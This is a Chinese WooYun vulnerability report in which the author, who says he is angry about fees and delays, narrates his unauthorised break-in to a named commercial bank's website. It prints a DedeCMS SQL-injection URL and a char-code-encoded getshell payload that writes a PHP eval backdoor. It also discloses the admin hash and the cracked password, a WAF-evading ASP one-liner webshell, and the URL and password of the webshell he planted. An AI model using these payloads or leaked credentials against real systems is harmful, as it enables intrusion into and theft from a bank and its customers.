当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103180

漏洞标题:对广东省某商业银行的安全检测全过程

相关厂商:对广东省某商业银行

漏洞作者: 猪猪侠表哥

提交时间:2015-03-23 13:52

修复时间:2015-05-08 17:34

公开时间:2015-05-08 17:34

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-24: 厂商已经确认,细节仅向厂商公开
2015-04-03: 细节向核心白帽子及相关领域专家公开
2015-04-13: 细节向普通白帽子公开
2015-04-23: 细节向实习白帽子公开
2015-05-08: 细节向公众公开

简要描述:

先来个开场白吧,前几天无聊, 本来想看看市xx局的,后来想了下,还有几天就要开学了,然后就想到学校的一卡通,还有进校门就要刷卡,一卡通是学校跟高要农商银行合作的,还他妈的不支持支付宝转账,跨行转账就要五块钱的手续费,想想都觉得可怕,他妈的就是在这里坑钱的,对于本穷屌来说就更可怕了。我亦为何偏偏喜欢它呢?又想起以前的心酸往事了,本穷屌申请了国家的助学金,学校一定要去高要农商银行办卡才能给你发助学金,一定要去市中医院对面的那间高要农商银行办卡,后来我就和王某去了那间银行,结果我们到了并表示来意的时候,那间银行的经理叫我们到其他的支行去办,说他们要下班了,但是离他们下班的时间还有一个小时,但他就不肯让我们在这里班,怕拖延他下班的时间,我们就想,反正都是同一个银行,到其他支行办也应该行的,后来就找了几间支行,最后找到一间是没有下班的,办完之后,没想到第二天去交复印件的时候,辅导员就问我们去那间办的银行卡,我们说了之后,辅导员说,不行,一定要到指定的那间,要不学校是不会认的,我们只好中午再出去办,去到银行,有很多人,只能慢慢排队,结果就要上课了,还没有轮到我们,就只好请假咯,正好那天下午是我想上的ps课,后来就顺利交了复印件,可是我等那钱等到学期末,还没有发,正好我那时手头紧,一次次失望之后,说今学期不发,要到下个学期才发,原因嘛?就是学校要做那一卡通,合作的银行,还是高要农商银行。草泥马,又是这间银行,所以这次,嘻嘻!

详细说明:

目标:www.gyebank.com
首先来爬行一下网站
发现了熟悉的plus目录
目测是梦织的程序
直接上EXP(用的是椰树)
帐号密码出来了

QQ截图20150307025551.png


dmin(其实真实的帐号是admin) 6cbe0658e888860c8a04
这md5密文是20位的,怎么变成16位呢?
dedecms的密文都是去掉前三位和最后一位
e0658e888860c8a0
这样就可以了,拿去解密,发现要收费,本穷屌没钱,就拿了基友的帐号,花了一毛钱,把密文解出来了
解出来的结果是gy2013gy
现在最要是找后台了,各种工具扫描都没有结果
就利用搜索引擎来找吧,也没有结果
后来发现之前这间银行已经被别人爆过菊了
一年钱就有白帽子在乌云上提交过这间银行 的漏洞
看到这个毕竟有些失落和希望
他也是找不到后台,但是他是直接getshell的
所以用一下他用的EXP,看下是否有用

plus/search.php?keyword=as&typeArr[111%3D@`/'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`/'`+]=a


这个,没用
再直接getshell看看

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96


也没有成功,显然之前的漏洞已经补上了。
想看下有没有旁站,结果也没有,这个站用的是独立服务器。
最后的一点希望也变成失望,那就只能乖乖找后台咯
过了几天之后,又有心情了,继续
/dede 没用
/admin 没用
/login 没用
/manage 没用
/gy 没用
/gyebank 没用
/ebank 没用
/bank 发现跳转到/bank/login.php
后台终于找到了
http://www.gyebank.com/bank/login.php

QQ截图20150307024914.png


ok 试下帐号密码
dmin gy2013
登陆时说帐号不存在
郁闷了,怎么会这样
想了想,还是试下这个吧
admin gy2013
人品啊,终于登陆成功了

QQ截图20150307024957.png


终于拿下后台管理员权限了
经验告诉我
这种后台拿webshell权限有两种
1.在新增广告那里插入一句话木马
2.在模块那里插入木马,再更新下主页
但是,这次跟上面那里一样,都没有那么顺利
在广告那里插入一句话木马

QQ截图20150307030022.png


这个还是过安全狗的一句话木马
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
保存成功,用过狗菜刀去链接,报错
尼玛,银行装的防护软件就是牛
尝试链接多几次,还是不行,显示超时
原来我被银行封ip了
之前在测试可用的EXP代码时也被封过几次
貌似只封一两小时
也当是中场休息吧
过了两个小时之后,发现能访问银行网站了,终于解封了
再进后台,发现之前插的一句话木马被删除了
银行就是屌啊
这次换下思路,在管理器那里插

QQ截图20150307030240.png


但是用过狗菜刀连接时,又连接不上
最后又被封ip了
又过了两个小时解封后
这次我真的发怒了
直接在模块那里插php大马

QQ截图20150307041247.png


更新下主页

QQ截图20150307041451.png


成功
访问下大马的地址
http://www.gyebank.com/gyadmin.php ; 密码为king
成功

QQ截图20150307041521.png


QQ截图20150307041543.png


ok webshell权限拿到了。搞这个站真是坎坷啊!
随便吐槽一下,学校居然跟这种安全做得这么渣的银行合作。
呵呵,一年前是被别人爆菊,现在是被我爆菊

漏洞证明:

QQ截图20150307025551.png


QQ截图20150307024914.png


QQ截图20150307024957.png


QQ截图20150307030022.png


QQ截图20150307030240.png


QQ截图20150307041247.png


QQ截图20150307041451.png


QQ截图20150307041521.png


QQ截图20150307041543.png

修复方案:

我已经分不清我是在提交漏洞还是在写故事了

版权声明:转载请注明来源 猪猪侠表哥@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-24 17:33

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无